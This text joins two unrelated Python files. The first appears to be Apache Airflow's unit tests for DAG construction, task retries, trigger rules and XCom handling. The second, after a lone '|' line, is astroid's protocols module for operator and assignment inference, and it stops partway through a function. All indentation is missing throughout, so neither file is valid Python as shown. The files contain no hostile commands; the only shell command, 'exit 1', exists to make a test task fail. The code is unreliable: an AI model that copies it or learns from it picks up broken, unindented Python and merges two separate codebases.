from nose_parameterized import parameterized
from tests.core import TEST_DAG_FOLDER
DEFAULT_DATE = datetime.datetime(2016, 1, 1)
TEST_DAGS_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
class DagTest(unittest.TestCase):
def test_parms_not_passed_is_empty_dict(self):
"""
Test that when 'params' is _not_ passed to a new Dag, that the params
attribute is set to an empty dictionary.
"""
dag = models.DAG('test-dag')
self.assertEqual(dict, type(dag.params))
self.assertEqual(0, len(dag.params))
def test_params_passed_and_params_in_default_args_no_override(self):
"""
Test that when 'params' exists as a key passed to the default_args dict
in addition to params being passed explicitly as an argument to the
dag, that the 'params' key of the default_args dict is merged with the
dict of the params argument.
"""
params1 = {'parameter1': 1}
params2 = {'parameter2': 2}
dag = models.DAG('test-dag',
default_args={'params': params1},
params=params2)
params_combined = params1.copy()
params_combined.update(params2)
self.assertEqual(params_combined, dag.params)
def test_dag_as_context_manager(self):
"""
Test DAG as a context manager.
When used as a context manager, Operators are automatically added to
the DAG (unless they specifiy a different DAG)
"""
dag = DAG(
'dag',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
dag2 = DAG(
'dag2',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner2'})
with dag:
op1 = DummyOperator(task_id='op1')
op2 = DummyOperator(task_id='op2', dag=dag2)
self.assertIs(op1.dag, dag)
self.assertEqual(op1.owner, 'owner1')
self.assertIs(op2.dag, dag2)
self.assertEqual(op2.owner, 'owner2')
with dag2:
op3 = DummyOperator(task_id='op3')
self.assertIs(op3.dag, dag2)
self.assertEqual(op3.owner, 'owner2')
with dag:
with dag2:
op4 = DummyOperator(task_id='op4')
op5 = DummyOperator(task_id='op5')
self.assertIs(op4.dag, dag2)
self.assertIs(op5.dag, dag)
self.assertEqual(op4.owner, 'owner2')
self.assertEqual(op5.owner, 'owner1')
with DAG('creating_dag_in_cm', start_date=DEFAULT_DATE) as dag:
DummyOperator(task_id='op6')
self.assertEqual(dag.dag_id, 'creating_dag_in_cm')
self.assertEqual(dag.tasks[0].task_id, 'op6')
class DagRunTest(unittest.TestCase):
def setUp(self):
self.dagbag = models.DagBag(dag_folder=TEST_DAG_FOLDER)
def create_dag_run(self, dag_id, state=State.RUNNING, task_states=None):
now = datetime.datetime.now()
dag = self.dagbag.get_dag(dag_id)
dag_run = dag.create_dagrun(
run_id='manual__' + now.isoformat(),
execution_date=now,
start_date=now,
state=State.RUNNING,
external_trigger=False,
)
if task_states is not None:
session = settings.Session()
for task_id, state in task_states.items():
ti = dag_run.get_task_instance(task_id)
ti.set_state(state, session)
session.close()
return dag_run
def test_id_for_date(self):
run_id = models.DagRun.id_for_date(
datetime.datetime(2015, 1, 2, 3, 4, 5, 6, None))
self.assertEqual(
'scheduled__2015-01-02T03:04:05', run_id,
'Generated run_id did not match expectations: {0}'.format(run_id))
def test_dagrun_running_when_upstream_skipped(self):
"""
Tests that a DAG run is not failed when an upstream task is skipped
"""
initial_task_states = {
'test_short_circuit_false': State.SUCCESS,
'test_state_skipped1': State.SKIPPED,
'test_state_skipped2': State.NONE,
}
# dags/test_dagrun_short_circuit_false.py
dag_run = self.create_dag_run('test_dagrun_short_circuit_false',
state=State.RUNNING,
task_states=initial_task_states)
updated_dag_state = dag_run.update_state()
self.assertEqual(State.RUNNING, updated_dag_state)
def test_dagrun_success_when_all_skipped(self):
"""
Tests that a DAG run succeeds when all tasks are skipped
"""
initial_task_states = {
'test_short_circuit_false': State.SUCCESS,
'test_state_skipped1': State.SKIPPED,
'test_state_skipped2': State.SKIPPED,
}
# dags/test_dagrun_short_circuit_false.py
dag_run = self.create_dag_run('test_dagrun_short_circuit_false',
state=State.RUNNING,
task_states=initial_task_states)
updated_dag_state = dag_run.update_state()
self.assertEqual(State.SUCCESS, updated_dag_state)
class DagBagTest(unittest.TestCase):
def test_get_existing_dag(self):
"""
test that were're able to parse some example DAGs and retrieve them
"""
dagbag = models.DagBag(include_examples=True)
some_expected_dag_ids = ["example_bash_operator",
"example_branch_operator"]
for dag_id in some_expected_dag_ids:
dag = dagbag.get_dag(dag_id)
self.assertIsNotNone(dag)
self.assertEqual(dag_id, dag.dag_id)
self.assertGreaterEqual(dagbag.size(), 7)
def test_get_non_existing_dag(self):
"""
test that retrieving a non existing dag id returns None without crashing
"""
dagbag = models.DagBag(include_examples=True)
non_existing_dag_id = "non_existing_dag_id"
self.assertIsNone(dagbag.get_dag(non_existing_dag_id))
def test_process_file_that_contains_multi_bytes_char(self):
"""
test that we're able to parse file that contains multi-byte char
"""
from tempfile import NamedTemporaryFile
f = NamedTemporaryFile()
f.write('\u3042'.encode('utf8')) # write multi-byte char (hiragana)
f.flush()
dagbag = models.DagBag(include_examples=True)
self.assertEqual([], dagbag.process_file(f.name))
def test_zip(self):
"""
test the loading of a DAG within a zip file that includes dependencies
"""
dagbag = models.DagBag()
dagbag.process_file(os.path.join(TEST_DAGS_FOLDER, "test_zip.zip"))
self.assertTrue(dagbag.get_dag("test_zip_dag"))
@patch.object(DagModel,'get_current')
def test_get_dag_without_refresh(self, mock_dagmodel):
"""
Test that, once a DAG is loaded, it doesn't get refreshed again if it
hasn't been expired.
"""
dag_id = 'example_bash_operator'
mock_dagmodel.return_value = DagModel()
mock_dagmodel.return_value.last_expired = None
mock_dagmodel.return_value.fileloc = 'foo'
class TestDagBag(models.DagBag):
process_file_calls = 0
def process_file(self, filepath, only_if_updated=True, safe_mode=True):
if 'example_bash_operator.py' == os.path.basename(filepath):
TestDagBag.process_file_calls += 1
super(TestDagBag, self).process_file(filepath, only_if_updated, safe_mode)
dagbag = TestDagBag(include_examples=True)
processed_files = dagbag.process_file_calls
# Should not call process_file agani, since it's already loaded during init.
self.assertEqual(1, dagbag.process_file_calls)
self.assertIsNotNone(dagbag.get_dag(dag_id))
self.assertEqual(1, dagbag.process_file_calls)
def test_get_dag_fileloc(self):
"""
Test that fileloc is correctly set when we load example DAGs,
specifically SubDAGs.
"""
dagbag = models.DagBag(include_examples=True)
expected = {
'example_bash_operator': 'example_bash_operator.py',
'example_subdag_operator': 'example_subdag_operator.py',
'example_subdag_operator.section-1': 'subdags/subdag.py'
}
for dag_id, path in expected.items():
dag = dagbag.get_dag(dag_id)
self.assertTrue(
dag.fileloc.endswith('airflow/example_dags/' + path))
class TaskInstanceTest(unittest.TestCase):
def test_set_dag(self):
"""
Test assigning Operators to Dags, including deferred assignment
"""
dag = DAG('dag', start_date=DEFAULT_DATE)
dag2 = DAG('dag2', start_date=DEFAULT_DATE)
op = DummyOperator(task_id='op_1', owner='test')
# no dag assigned
self.assertFalse(op.has_dag())
self.assertRaises(AirflowException, getattr, op, 'dag')
# no improper assignment
with self.assertRaises(TypeError):
op.dag = 1
op.dag = dag
# no reassignment
with self.assertRaises(AirflowException):
op.dag = dag2
# but assigning the same dag is ok
op.dag = dag
self.assertIs(op.dag, dag)
self.assertIn(op, dag.tasks)
def test_infer_dag(self):
dag = DAG('dag', start_date=DEFAULT_DATE)
dag2 = DAG('dag2', start_date=DEFAULT_DATE)
op1 = DummyOperator(task_id='test_op_1', owner='test')
op2 = DummyOperator(task_id='test_op_2', owner='test')
op3 = DummyOperator(task_id='test_op_3', owner='test', dag=dag)
op4 = DummyOperator(task_id='test_op_4', owner='test', dag=dag2)
# double check dags
self.assertEqual(
[i.has_dag() for i in [op1, op2, op3, op4]],
[False, False, True, True])
# can't combine operators with no dags
self.assertRaises(AirflowException, op1.set_downstream, op2)
# op2 should infer dag from op1
op1.dag = dag
op1.set_downstream(op2)
self.assertIs(op2.dag, dag)
# can't assign across multiple DAGs
self.assertRaises(AirflowException, op1.set_downstream, op4)
self.assertRaises(AirflowException, op1.set_downstream, [op3, op4])
def test_bitshift_compose_operators(self):
dag = DAG('dag', start_date=DEFAULT_DATE)
op1 = DummyOperator(task_id='test_op_1', owner='test')
op2 = DummyOperator(task_id='test_op_2', owner='test')
op3 = DummyOperator(task_id='test_op_3', owner='test')
op4 = DummyOperator(task_id='test_op_4', owner='test')
op5 = DummyOperator(task_id='test_op_5', owner='test')
# can't compose operators without dags
with self.assertRaises(AirflowException):
op1 >> op2
dag >> op1 >> op2 << op3
# make sure dag assignment carries through
# using __rrshift__
self.assertIs(op1.dag, dag)
self.assertIs(op2.dag, dag)
self.assertIs(op3.dag, dag)
# op2 should be downstream of both
self.assertIn(op2, op1.downstream_list)
self.assertIn(op2, op3.downstream_list)
# test dag assignment with __rlshift__
dag << op4
self.assertIs(op4.dag, dag)
# dag assignment with __rrshift__
dag >> op5
self.assertIs(op5.dag, dag)
@patch.object(DAG, 'concurrency_reached')
def test_requeue_over_concurrency(self, mock_concurrency_reached):
mock_concurrency_reached.return_value = True
dag = DAG(dag_id='test_requeue_over_concurrency', start_date=DEFAULT_DATE,
max_active_runs=1, concurrency=2)
task = DummyOperator(task_id='test_requeue_over_concurrency_op', dag=dag)
ti = TI(task=task, execution_date=datetime.datetime.now())
ti.run()
self.assertEqual(ti.state, models.State.NONE)
@patch.object(TI, 'pool_full')
def test_run_pooling_task(self, mock_pool_full):
"""
test that running task update task state as without running task.
(no dependency check in ti_deps anymore, so also -> SUCCESS)
"""
# Mock the pool out with a full pool because the pool doesn't actually exist
mock_pool_full.return_value = True
dag = models.DAG(dag_id='test_run_pooling_task')
task = DummyOperator(task_id='test_run_pooling_task_op', dag=dag,
pool='test_run_pooling_task_pool', owner='airflow',
start_date=datetime.datetime(2016, 2, 1, 0, 0, 0))
ti = TI(
task=task, execution_date=datetime.datetime.now())
ti.run()
self.assertEqual(ti.state, models.State.SUCCESS)
@patch.object(TI, 'pool_full')
def test_run_pooling_task_with_mark_success(self, mock_pool_full):
"""
test that running task with mark_success param update task state as SUCCESS
without running task.
"""
# Mock the pool out with a full pool because the pool doesn't actually exist
mock_pool_full.return_value = True
dag = models.DAG(dag_id='test_run_pooling_task_with_mark_success')
task = DummyOperator(
task_id='test_run_pooling_task_with_mark_success_op',
dag=dag,
pool='test_run_pooling_task_with_mark_success_pool',
owner='airflow',
start_date=datetime.datetime(2016, 2, 1, 0, 0, 0))
ti = TI(
task=task, execution_date=datetime.datetime.now())
ti.run(mark_success=True)
self.assertEqual(ti.state, models.State.SUCCESS)
def test_run_pooling_task_with_skip(self):
"""
test that running task which returns AirflowSkipOperator will end
up in a SKIPPED state.
"""
def raise_skip_exception():
raise AirflowSkipException
dag = models.DAG(dag_id='test_run_pooling_task_with_skip')
task = PythonOperator(
task_id='test_run_pooling_task_with_skip',
dag=dag,
python_callable=raise_skip_exception,
owner='airflow',
start_date=datetime.datetime(2016, 2, 1, 0, 0, 0))
ti = TI(
task=task, execution_date=datetime.datetime.now())
ti.run()
self.assertTrue(ti.state == models.State.SKIPPED)
def test_retry_delay(self):
"""
Test that retry delays are respected
"""
dag = models.DAG(dag_id='test_retry_handling')
task = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
retry_delay=datetime.timedelta(seconds=3),
dag=dag,
owner='airflow',
start_date=datetime.datetime(2016, 2, 1, 0, 0, 0))
def run_with_error(ti):
try:
ti.run()
except AirflowException:
pass
ti = TI(
task=task, execution_date=datetime.datetime.now())
# first run -- up for retry
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 1)
# second run -- still up for retry because retry_delay hasn't expired
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
# third run -- failed
time.sleep(3)
run_with_error(ti)
self.assertEqual(ti.state, State.FAILED)
@patch.object(TI, 'pool_full')
def test_retry_handling(self, mock_pool_full):
"""
Test that task retries are handled properly
"""
# Mock the pool with a pool with slots open since the pool doesn't actually exist
mock_pool_full.return_value = False
dag = models.DAG(dag_id='test_retry_handling')
task = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
retry_delay=datetime.timedelta(seconds=0),
dag=dag,
owner='airflow',
start_date=datetime.datetime(2016, 2, 1, 0, 0, 0))
def run_with_error(ti):
try:
ti.run()
except AirflowException:
pass
ti = TI(
task=task, execution_date=datetime.datetime.now())
# first run -- up for retry
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 1)
# second run -- fail
run_with_error(ti)
self.assertEqual(ti.state, State.FAILED)
self.assertEqual(ti.try_number, 2)
# Clear the TI state since you can't run a task with a FAILED state without
# clearing it first
ti.set_state(None, settings.Session())
# third run -- up for retry
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 3)
# fourth run -- fail
run_with_error(ti)
self.assertEqual(ti.state, State.FAILED)
self.assertEqual(ti.try_number, 4)
def test_next_retry_datetime(self):
delay = datetime.timedelta(seconds=3)
delay_squared = datetime.timedelta(seconds=9)
max_delay = datetime.timedelta(seconds=10)
dag = models.DAG(dag_id='fail_dag')
task = BashOperator(
task_id='task_with_exp_backoff_and_max_delay',
bash_command='exit 1',
retries=3,
retry_delay=delay,
retry_exponential_backoff=True,
max_retry_delay=max_delay,
dag=dag,
owner='airflow',
start_date=datetime.datetime(2016, 2, 1, 0, 0, 0))
ti = TI(
task=task, execution_date=datetime.datetime.now())
ti.end_date = datetime.datetime.now()
ti.try_number = 1
dt = ti.next_retry_datetime()
self.assertEqual(dt, ti.end_date+delay)
ti.try_number = 2
dt = ti.next_retry_datetime()
self.assertEqual(dt, ti.end_date+delay_squared)
ti.try_number = 3
dt = ti.next_retry_datetime()
self.assertEqual(dt, ti.end_date+max_delay)
def test_depends_on_past(self):
dagbag = models.DagBag(dag_folder=TEST_DAG_FOLDER)
dag = dagbag.get_dag('test_depends_on_past')
dag.clear()
task = dag.tasks[0]
run_date = task.start_date + datetime.timedelta(days=5)
ti = TI(task, run_date)
# depends_on_past prevents the run
task.run(start_date=run_date, end_date=run_date)
ti.refresh_from_db()
self.assertIs(ti.state, None)
# ignore first depends_on_past to allow the run
task.run(
start_date=run_date,
end_date=run_date,
ignore_first_depends_on_past=True)
ti.refresh_from_db()
self.assertEqual(ti.state, State.SUCCESS)
# Parameterized tests to check for the correct firing
# of the trigger_rule under various circumstances
# Numeric fields are in order:
# successes, skipped, failed, upstream_failed, done
@parameterized.expand([
#
# Tests for all_success
#
['all_success', 5, 0, 0, 0, 5, True, None, True],
['all_success', 2, 0, 0, 0, 2, True, None, False],
['all_success', 2, 0, 1, 0, 3, True, ST.UPSTREAM_FAILED, False],
['all_success', 2, 1, 0, 0, 3, True, None, False],
['all_success', 0, 5, 0, 0, 5, True, ST.SKIPPED, True],
#
# Tests for one_success
#
['one_success', 5, 0, 0, 0, 5, True, None, True],
['one_success', 2, 0, 0, 0, 2, True, None, True],
['one_success', 2, 0, 1, 0, 3, True, None, True],
['one_success', 2, 1, 0, 0, 3, True, None, True],
['one_success', 0, 2, 0, 0, 2, True, None, True],
#
# Tests for all_failed
#
['all_failed', 5, 0, 0, 0, 5, True, ST.SKIPPED, False],
['all_failed', 0, 0, 5, 0, 5, True, None, True],
['all_failed', 2, 0, 0, 0, 2, True, ST.SKIPPED, False],
['all_failed', 2, 0, 1, 0, 3, True, ST.SKIPPED, False],
['all_failed', 2, 1, 0, 0, 3, True, ST.SKIPPED, False],
#
# Tests for one_failed
#
['one_failed', 5, 0, 0, 0, 5, True, ST.SKIPPED, False],
['one_failed', 2, 0, 0, 0, 2, True, None, False],
['one_failed', 2, 0, 1, 0, 2, True, None, True],
['one_failed', 2, 1, 0, 0, 3, True, None, False],
['one_failed', 2, 3, 0, 0, 5, True, ST.SKIPPED, False],
#
# Tests for done
#
['all_done', 5, 0, 0, 0, 5, True, None, True],
['all_done', 2, 0, 0, 0, 2, True, None, False],
['all_done', 2, 0, 1, 0, 3, True, None, False],
['all_done', 2, 1, 0, 0, 3, True, None, False]
])
def test_check_task_dependencies(self, trigger_rule, successes, skipped,
failed, upstream_failed, done,
flag_upstream_failed,
expect_state, expect_completed):
start_date = datetime.datetime(2016, 2, 1, 0, 0, 0)
dag = models.DAG('test-dag', start_date=start_date)
downstream = DummyOperator(task_id='downstream',
dag=dag, owner='airflow',
trigger_rule=trigger_rule)
for i in range(5):
task = DummyOperator(task_id='runme_{}'.format(i),
dag=dag, owner='airflow')
task.set_downstream(downstream)
run_date = task.start_date + datetime.timedelta(days=5)
ti = TI(downstream, run_date)
dep_results = TriggerRuleDep()._evaluate_trigger_rule(
ti=ti,
successes=successes,
skipped=skipped,
failed=failed,
upstream_failed=upstream_failed,
done=done,
flag_upstream_failed=flag_upstream_failed)
completed = all([dep.passed for dep in dep_results])
self.assertEqual(completed, expect_completed)
self.assertEqual(ti.state, expect_state)
def test_xcom_pull_after_success(self):
"""
tests xcom set/clear relative to a task in a 'success' rerun scenario
"""
key = 'xcom_key'
value = 'xcom_value'
dag = models.DAG(dag_id='test_xcom', schedule_interval='@monthly')
task = DummyOperator(
task_id='test_xcom',
dag=dag,
pool='test_xcom',
owner='airflow',
start_date=datetime.datetime(2016, 6, 2, 0, 0, 0))
exec_date = datetime.datetime.now()
ti = TI(
task=task, execution_date=exec_date)
ti.run(mark_success=True)
ti.xcom_push(key=key, value=value)
self.assertEqual(ti.xcom_pull(task_ids='test_xcom', key=key), value)
ti.run()
# The second run and assert is to handle AIRFLOW-131 (don't clear on
# prior success)
self.assertEqual(ti.xcom_pull(task_ids='test_xcom', key=key), value)
# Test AIRFLOW-703: Xcom shouldn't be cleared if the task doesn't
# execute, even if dependencies are ignored
ti.run(ignore_all_deps=True, mark_success=True)
self.assertEqual(ti.xcom_pull(task_ids='test_xcom', key=key), value)
# Xcom IS finally cleared once task has executed
ti.run(ignore_all_deps=True)
self.assertEqual(ti.xcom_pull(task_ids='test_xcom', key=key), None)
def test_xcom_pull_different_execution_date(self):
"""
tests xcom fetch behavior with different execution dates, using
both xcom_pull with "include_prior_dates" and without
"""
key = 'xcom_key'
value = 'xcom_value'
dag = models.DAG(dag_id='test_xcom', schedule_interval='@monthly')
task = DummyOperator(
task_id='test_xcom',
dag=dag,
pool='test_xcom',
owner='airflow',
start_date=datetime.datetime(2016, 6, 2, 0, 0, 0))
exec_date = datetime.datetime.now()
ti = TI(
task=task, execution_date=exec_date)
ti.run(mark_success=True)
ti.xcom_push(key=key, value=value)
self.assertEqual(ti.xcom_pull(task_ids='test_xcom', key=key), value)
ti.run()
exec_date += datetime.timedelta(days=1)
ti = TI(
task=task, execution_date=exec_date)
ti.run()
# We have set a new execution date (and did not pass in
# 'include_prior_dates'which means this task should now have a cleared
# xcom value
self.assertEqual(ti.xcom_pull(task_ids='test_xcom', key=key), None)
# We *should* get a value using 'include_prior_dates'
self.assertEqual(ti.xcom_pull(task_ids='test_xcom',
key=key,
include_prior_dates=True),
value)
def test_post_execute_hook(self):
"""
Test that post_execute hook is called with the Operator's result.
The result ('error') will cause an error to be raised and trapped.
"""
class TestError(Exception):
pass
class TestOperator(PythonOperator):
def post_execute(self, context, result):
if result == 'error':
raise TestError('expected error.')
dag = models.DAG(dag_id='test_post_execute_dag')
task = TestOperator(
task_id='test_operator',
dag=dag,
python_callable=lambda: 'error',
owner='airflow',
start_date=datetime.datetime(2017, 2, 1))
ti = TI(task=task, execution_date=datetime.datetime.now())
with self.assertRaises(TestError):
ti.run()
|
|
# copyright 2003-2013 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This file is part of astroid.
#
# astroid is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 2.1 of the License, or (at your
# option) any later version.
#
# astroid is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License
# for more details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with astroid. If not, see <http://www.gnu.org/licenses/>.
"""this module contains a set of functions to handle python protocols for nodes
where it makes sense.
"""
import collections
import operator
import sys
from astroid import arguments
from astroid import bases
from astroid import context as contextmod
from astroid import exceptions
from astroid import node_classes
from astroid import nodes
from astroid import util
BIN_OP_METHOD = {'+': '__add__',
'-': '__sub__',
'/': '__div__',
'//': '__floordiv__',
'*': '__mul__',
'**': '__pow__',
'%': '__mod__',
'&': '__and__',
'|': '__or__',
'^': '__xor__',
'<<': '__lshift__',
'>>': '__rshift__',
'@': '__matmul__'
}
UNARY_OP_METHOD = {'+': '__pos__',
'-': '__neg__',
'~': '__invert__',
'not': None, # XXX not '__nonzero__'
}
# unary operations ############################################################
def tl_infer_unary_op(self, operator):
if operator == 'not':
return node_classes.const_factory(not bool(self.elts))
raise TypeError() # XXX log unsupported operation
nodes.Tuple.infer_unary_op = tl_infer_unary_op
nodes.List.infer_unary_op = tl_infer_unary_op
def dict_infer_unary_op(self, operator):
if operator == 'not':
return node_classes.const_factory(not bool(self.items))
raise TypeError() # XXX log unsupported operation
nodes.Dict.infer_unary_op = dict_infer_unary_op
def const_infer_unary_op(self, operator):
if operator == 'not':
return node_classes.const_factory(not self.value)
# XXX log potentially raised TypeError
elif operator == '+':
return node_classes.const_factory(+self.value)
else: # operator == '-':
return node_classes.const_factory(-self.value)
nodes.Const.infer_unary_op = const_infer_unary_op
# binary operations ###########################################################
BIN_OP_IMPL = {'+': lambda a, b: a + b,
'-': lambda a, b: a - b,
'/': lambda a, b: a / b,
'//': lambda a, b: a // b,
'*': lambda a, b: a * b,
'**': lambda a, b: a ** b,
'%': lambda a, b: a % b,
'&': lambda a, b: a & b,
'|': lambda a, b: a | b,
'^': lambda a, b: a ^ b,
'<<': lambda a, b: a << b,
'>>': lambda a, b: a >> b,
}
if sys.version_info >= (3, 5):
# MatMult is available since Python 3.5+.
BIN_OP_IMPL['@'] = operator.matmul
for key, impl in list(BIN_OP_IMPL.items()):
BIN_OP_IMPL[key+'='] = impl
def const_infer_binary_op(self, binop, other, context):
operator = binop.op
for other in other.infer(context):
if isinstance(other, nodes.Const):
try:
impl = BIN_OP_IMPL[operator]
try:
yield node_classes.const_factory(impl(self.value, other.value))
except Exception:
# ArithmeticError is not enough: float >> float is a TypeError
# TODO : let pylint know about the problem
pass
except TypeError:
# XXX log TypeError
continue
elif other is util.YES:
yield other
else:
try:
for val in other.infer_binary_op(binop, self, context):
yield val
except AttributeError:
yield util.YES
nodes.Const.infer_binary_op = bases.yes_if_nothing_inferred(const_infer_binary_op)
def _multiply_seq_by_int(self, binop, other, context):
node = self.__class__()
node.parent = binop
elts = []
for elt in self.elts:
infered = util.safe_infer(elt, context)
if infered is None:
infered = util.YES
elts.append(infered)
node.elts = elts * other.value
return node
def _filter_uninferable_nodes(elts, context):
for elt in elts:
if elt is util.YES:
yield elt
else:
for inferred in elt.infer(context):
yield inferred
def tl_infer_binary_op(self, binop, other, context):
operator = binop.op
for other in other.infer(context):
if isinstance(other, self.__class__) and operator == '+':
node = self.__class__()
node.parent = binop
elts = list(_filter_uninferable_nodes(self.elts, context))
elts += list(_filter_uninferable_nodes(other.elts, context))
node.elts = elts
yield node
elif isinstance(other, nodes.Const) and operator == '*':
if not isinstance(other.value, int):
yield util.YES
continue
yield _multiply_seq_by_int(self, binop, other, context)
elif isinstance(other, bases.Instance) and not isinstance(other, nodes.Const):
yield util.YES
# XXX else log TypeError
nodes.Tuple.infer_binary_op = bases.yes_if_nothing_inferred(tl_infer_binary_op)
nodes.List.infer_binary_op = bases.yes_if_nothing_inferred(tl_infer_binary_op)
def dict_infer_binary_op(self, binop, other, context):
for other in other.infer(context):
if isinstance(other, bases.Instance) and isinstance(other._proxied, nodes.ClassDef):
yield util.YES
# XXX else log TypeError
nodes.Dict.infer_binary_op = bases.yes_if_nothing_inferred(dict_infer_binary_op)
def instance_infer_binary_op(self, binop, other, context):
operator = binop.op
try:
methods = self.getattr(BIN_OP_METHOD[operator])
except (exceptions.NotFoundError, KeyError):
# Unknown operator
yield util.YES
else:
for method in methods:
if not isinstance(method, nodes.FunctionDef):
continue
for result in method.infer_call_result(self, context):
if result is not util.YES:
yield result
# We are interested only in the first infered method,
# don't go looking in the rest of the methods of the ancestors.
break
bases.Instance.infer_binary_op = bases.yes_if_nothing_inferred(instance_infer_binary_op)
# assignment ##################################################################
"""the assigned_stmts method is responsible to return the assigned statement
(e.g. not inferred) according to the assignment type.
The `asspath` argument is used to record the lhs path of the original node.
For instance if we want assigned statements for 'c' in 'a, (b,c)', asspath
will be [1, 1] once arrived to the Assign node.
The `context` argument is the current inference context which should be given
to any intermediary inference necessary.
"""
def _resolve_looppart(parts, asspath, context):
"""recursive function to resolve multiple assignments on loops"""
asspath = asspath[:]
index = asspath.pop(0)
for part in parts:
if part is util.YES:
continue
# XXX handle __iter__ and log potentially detected errors
if not hasattr(part, 'itered'):
continue
try:
itered = part.itered()
except TypeError:
continue # XXX log error
for stmt in itered:
try:
assigned = stmt.getitem(index, context)
except (AttributeError, IndexError):
continue
except TypeError: # stmt is unsubscriptable Const
continue
if not asspath:
# we achieved to resolved the assignment path,
# don't infer the last part
yield assigned
elif assigned is util.YES:
break
else:
# we are not yet on the last part of the path
# search on each possibly inferred value
try:
for inferred in _resolve_looppart(assigned.infer(context),
asspath, context):
yield inferred
except exceptions.InferenceError:
break
@bases.raise_if_nothing_inferred
def for_assigned_stmts(self, node=None, context=None, asspath=None):
if asspath is None:
for lst in self.iter.infer(context):
if isinstance(lst, (nodes.Tuple, nodes.List)):
for item in lst.elts:
yield item
else:
for inferred in _resolve_looppart(self.iter.infer(context),
asspath, context):
yield inferred
nodes.For.assigned_stmts = for_assigned_stmts
nodes.Comprehension.assigned_stmts = for_assigned_stmts
def sequence_assigned_stmts(self, node=None, context=None, asspath=None):
if asspath is None:
asspath = []
try:
index = self.elts.index(node)
except ValueError:
util.reraise(exceptions.InferenceError(
'Tried to retrieve a node {node!r} which does not exist',
node=self, assign_path=asspath, context=context))
asspath.insert(0, index)
return self.parent.assigned_stmts(node=self, context=context, asspath=asspath)
nodes.Tuple.assigned_stmts = sequence_assigned_stmts
nodes.List.assigned_stmts = sequence_assigned_stmts
def assend_assigned_stmts(self, node=None, context=None, asspath=None):
return self.parent.assigned_stmts(node=self, context=context)
nodes.AssignName.assigned_stmts = assend_assigned_stmts
nodes.AssignAttr.assigned_stmts = assend_assigned_stmts
def _arguments_infer_argname(self, name, context):
# arguments information may be missing, in which case we can't do anything
# more
if not (self.args or self.vararg or self.kwarg):
yield util.YES
return
# first argument of instance/class method
if self.args and getattr(self.args[0], 'name', None) == name:
functype = self.parent.type
if functype == 'method':
yield bases.Instance(self.parent.parent.frame())
return
if functype == 'classmethod':
yield self.parent.parent.frame()
return
if context and context.callcontext:
call_site = arguments.CallSite(context.callcontext)
for value in call_site.infer_argument(self.parent, name, context):
yield value
return
# TODO: just provide the type here, no need to have an empty Dict.
if name == self.vararg:
vararg = node_classes.const_factory(())
vararg.parent = self
yield vararg
return
if name == self.kwarg:
kwarg = node_classes.const_factory({})
kwarg.parent = self
yield kwarg
return
# if there is a default value, yield it. And then yield YES to reflect
# we can't guess given argument value
try:
context = contextmod.copy_context(context)
for inferred in self.default_value(name).infer(context):
yield inferred
yield util.YES
except exceptions.NoDefault:
yield util.YES
def arguments_assigned_stmts(self, node=None, context=None, asspath=None):
if context.callcontext:
# reset call context/name
callcontext = context.callcontext
context = contextmod.copy_context(context)
context.callcontext = None
args = arguments.CallSite(callcontext)
return args.infer_argument(self.parent, node.name, context)
return _arguments_infer_argname(self, node.name, context)
nodes.Arguments.assigned_stmts = arguments_assigned_stmts
@bases.raise_if_nothing_inferred
def assign_assigned_stmts(self, node=None, context=None, asspath=None):
if not asspath:
yield self.value
return
for inferred in _resolve_asspart(self.value.infer(context), asspath, context):
yield inferred
nodes.Assign.assigned_stmts = assign_assigned_stmts
nodes.AugAssign.assigned_stmts = assign_assigned_stmts
def _resolve_asspart(parts, asspath, context):
"""recursive function to resolve multiple assignments"""
asspath = asspath[:]
index = asspath.pop(0)
for part in parts:
if hasattr(part, 'getitem'):
try:
assigned = part.getitem(index, context)
# XXX raise a specific exception to avoid potential hiding of
# unexpected exception ?
except (TypeError, IndexError):
return
if not asspath:
# we achieved to resolved the assignment path, don't infer the
# last part
yield assigned
elif assigned is util.YES:
return
else:
# we are not yet on the last part of the path search on each
# possibly inferred value
try:
for inferred in _resolve_asspart(assigned.infer(context),
asspath, context):
yield inferred
except exceptions.InferenceError:
return
@bases.raise_if_nothing_inferred
def excepthandler_assigned_stmts(self, node=None, context=None, asspath=None):
for assigned in node_classes.unpack_infer(self.type):
if isinstance(assigned, nodes.ClassDef):
assigned = bases.Instance(assigned)
yield assigned
nodes.ExceptHandler.assigned_stmts = bases.raise_if_nothing_inferred(excepthandler_assigned_stmts)
@bases.raise_if_nothing_inferred
def with_assigned_stmts(self, node=None, context=None, asspath=None):
if asspath is None:
for _, vars in self.items:
if vars is None:
continue
for lst in vars.infer(context):
if isinstance(lst, (nodes.Tuple, nodes.List)):
for item in lst.nodes:
yield item
nodes.With.assigned_stmts = with_assigned_stmts
@bases.yes_if_nothing_inferred
def starred_assigned_stmts(self, node=None, context=None, asspath=None):
stmt = self.statement()
if not isinstance(stmt, (nodes.Assign, nodes.For)):
raise exceptions.InferenceError()
if isinstance(stmt, nodes.Assign):
value = stmt.value
lhs = stmt.targets[0]
if sum(1 for node in lhs.nodes_of_class(nodes.Starred)) > 1:
# Too many starred arguments in the expression.
raise exceptions.InferenceError()
if context is None:
context = contextmod.InferenceContext()
try:
rhs = next(value.infer(context))
except exceptions.InferenceError:
yield util.YES
return
if rhs is util.YES or not hasattr(rhs, 'elts'):
# Not interested in inferred values without elts.
yield util.YES
return
elts = collections.deque(rhs.elts[:])
if len(lhs.elts) > len(rhs.elts):
